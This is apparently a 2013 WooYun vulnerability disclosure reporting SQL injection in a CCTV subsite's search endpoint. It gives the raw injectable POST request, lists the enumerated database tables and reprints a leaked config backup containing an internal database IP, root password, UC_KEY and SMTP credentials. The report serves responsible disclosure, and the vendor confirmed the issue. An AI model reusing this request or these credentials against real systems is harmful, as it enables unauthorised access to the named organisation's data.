当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046781

漏洞标题:中国网络电视台某站SQL注射以及敏感信息泄露

相关厂商:中国网络电视台

漏洞作者: 大胖子

提交时间:2013-12-23 10:48

修复时间:2014-02-06 10:49

公开时间:2014-02-06 10:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商已经确认,细节仅向厂商公开
2014-01-02: 细节向核心白帽子及相关领域专家公开
2014-01-12: 细节向普通白帽子公开
2014-01-22: 细节向实习白帽子公开
2014-02-06: 细节向公众公开

简要描述:

中国网络电视台某站多处注射,之前提交说是重复,编辑一下

详细说明:

zhandian.cctv.com


POST /batch.search.php HTTP/1.1
host:zhandian.cctv.com
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://zhandian.cctv.com/
Cookie: PHPSESSID=38e5400c4329be18d01ae28206b25511; _refer=http%253A%252F%252Fzhandian.cctv.com
%252Fbatch.download.php%253Faid%253D87044
Host: zhandian.cctv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63
Safari/537.36
Accept: */*
catid=1&keywords=%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97<code>

21.png


当前库113张表

222323.png


admin_uc

434.png

Database: news_center_uc
[19 tables]
+---------------------+
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+---------------------+</code>

漏洞证明:

dz敏感文件泄露

http://zhandian.cctv.com//config.php.bak


<?php
/*
[SupeSite/X-Space] (C)2001-2006 Comsenz Inc.
配置文件
$RCSfile: config.new.php,v $
$Revision: 1.1 $
$Date: 2007/07/03 13:50:17 $
*/
//--------------- 数据库设置 ------------------------------
//SupeSite数据库服务器
//SupeSite数据库服务器(一般为本地localhost)
$dbhost = '10.200.7.29';
//$dbhost = '127.0.0.1';
//SupeSite数据库用户名
$dbuser = 'root';
//SupeSite数据库密码
$dbpw = 'test123';
$dbpw = '';
//SupeSite数据库名
$dbname = 'news_center';
//SupeSite表名前缀(不能与论坛的表名前缀相同)
$tablepre = 'supe_';
//SupeSite数据库持久连接 0=关闭, 1=打开
$pconnect = 0;
//SupeSite数据库字符集
$dbcharset = 'utf8';
//Discuz!数据库服务器
//Discuz!论坛数据库服务器
//推荐情况下,你的Discuz!论坛与SupeSite应该是使用同一台MySQL服务器,所以请保留为空
//如果你确认使用不同的MySQL服务器,请填写Discuz!论坛使用的远程MySQL服务器IP
$dbhost_bbs = '';
//Discuz!数据库用户名
$dbuser_bbs = '';
//Discuz!数据库密码
$dbpw_bbs = '';
//Discuz!数据库名(如果与SupeSite安装在同一个数据库,留空即可)
$dbname_bbs = '';
//Discuz!表名前缀
$tablepre_bbs = '';
//Discuz!数据库持久连接 0=关闭, 1=打开
$pconnect_bbs = 0;
//Discuz!数据库字符集
$dbcharset_bbs = '';
$dbreport = 0;//是否发送数据库错误报告? 0=否, 1=是
//--------------- URL设置 ------------------------------
//SupeSite/X-Space程序文件所在目录的URL访问地址
//可以填写以 http:// 开头的完整URL,也可以填写相对URL。末尾不要加 /
//如果程序无法自动获取,请务必手工修改为 http://www.yourwebsite.com/supesite 形式
$siteurl = 'http://local.zhandian.cctv.com';
//论坛URL地址
//可以填写以http://开头的完整URL,也可以填写相对URL。末尾不要加 /
$bbsurl = 'http://local.zhandian.cctv.com/bbs';
//论坛附件目录URL地址(为空则系统将用论坛默认附件路径,如果您修改了论坛默认附件保存目录,请设置该选项)
$bbsattachurl = '';
//--------------- COOKIE设置 ------------------------------
//Cookie前缀
$cookiepre = 'zd_';
//cookie 作用域
//注意:为了与论坛同步登录,请设置为 .yourdomain.com 形式,并同时修改论坛config.inc.php文件的cookie作用域与之相同
$cookiedomain = '.cctv.com';
//cookie 作用路径
$cookiepath = '/';
//--------------- 字符集设置 ------------------------------
//强制设置字符集,只乱码时使用
$headercharset = 1;
//页面字符集(可选 'gbk', 'big5', 'utf-8')
$charset = 'utf-8';
//--------------- 邮件发送配置 ------------------------------
$adminemail = 'admin@yourdomain.com';//系统Email
$sendmail_silent = 1;//屏蔽邮件发送中的全部错误提示, 1=是, 0=否
//邮件发送方式
//0=不发送任何邮件
$mailsend = 2;
if($mailsend == 1) {
//1=通过 PHP 函数及 UNIX sendmail 发送(推荐此方式)
} elseif($mailsend == 2) {
//2=通过 SOCKET 连接 SMTP 服务器发送(支持 ESMTP 验证)
$mailcfg = array();
$mailcfg['server'] = 'smtp.126.com';//SMTP 服务器
$mailcfg['port'] = '25';//SMTP 端口, 默认不需修改
$mailcfg['auth'] = 1;//是否需要 AUTH LOGIN 验证, 1=是, 0=否
$mailcfg['from'] = 'supesitedemo@126.com';//发信人地址 (如果需要验证,必须为本服务器地址)
$mailcfg['auth_username'] = 'supesitedemo';//验证用户名
$mailcfg['auth_password'] = 'supesitedemo';//验证密码
} elseif($mailsend == 3) {
//3=通过 PHP 函数 SMTP 发送 Email(仅 win32 下有效, 不支持 ESMTP)
$mailcfg = array();
$mailcfg['server'] = 'smtp.your.com';// SMTP 服务器
$mailcfg['port'] = '25';// SMTP 端口, 默认不需修改
}
//--------------- 图片相册设置 ------------------------------
//用户创建图片主题,一次可以上传的图片数目
//不宜过多,否则容易上传因超时而失败
$uploadimgpernum = 6;
//--------------- 其他系统参数 ------------------------------
//不能自动拥有空间的用户组ID黑名单
//用户在没有升级空间前,系统会自动为其开通一个以论坛为主的空间,如果您想禁止一些用户组使用本功能,请修改本数组变量
$blackgroupids = array(4,5,6,7,8);
//论坛版本(选择Discuz!论坛的版本,可选值:4, 5, 6)
$bbsver = '5';
//数据库个人空间缓存表分表设置
//系统会根据用户uid范围进行自动分表处理。设置为0则不启用本功能
$perspacenum = 10000;//不要随便修改
//XS免费域名服务器(不要随便修改)
$xsdomain = 'ns.supesite.com';
//RED5服务器
$red5_server = $_SERVER['SERVER_NAME'];
//socket服务器
$socket_server = $_SERVER['SERVER_NAME'];
//socket端口范围
$socket_port = mt_rand(1024, 65536);
//站点缓存存放模式
$cachemode = 'database'; //file,database
//风格模板自动刷新开关
//关闭后,你修改模板页面后,需要手工进入管理员后台=>缓存更新 进行一下模板文件缓存清空,才能看到修改的效果。
$tplrefresh = 1;
//系统缓存分表等级(默认为1,级别每增加1,分表数目增加255个,级别越大,单个表的尺寸越小)
$cachegrade = 1;
// 用户中心模式(0:没有用户中心 1:有用户中心)
$ucmode = 1;
// ============================================================================
define('UC_CONNECT', 'mysql');
//define('UC_DBHOST', '127.0.0.1');
define('UC_DBHOST', '10.200.7.29');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'test123');
//define('UC_DBPW', '');
define('UC_DBNAME', 'news_center_uc');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`news_center_uc`.uc_');
define('UC_DBCONNECT', '0');
// 通信相关
define('UC_KEY', '123456');
define('UC_API', 'http://local.zhandian.cctv.com/uc');
define('UC_CHARSET', 'utf-8');
define('UC_IP', '127.0.0.1');
define('UC_APPID', '1');// 当前应用的 ID
// ============================================================================
define('UC_PPP', '20');


关于UC_KEY

 WooYun: 盛大某分站敏感配置文件泄露#1 可导致内网渗透 


修复方案:

版权声明:转载请注明来源 大胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-23 10:54

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无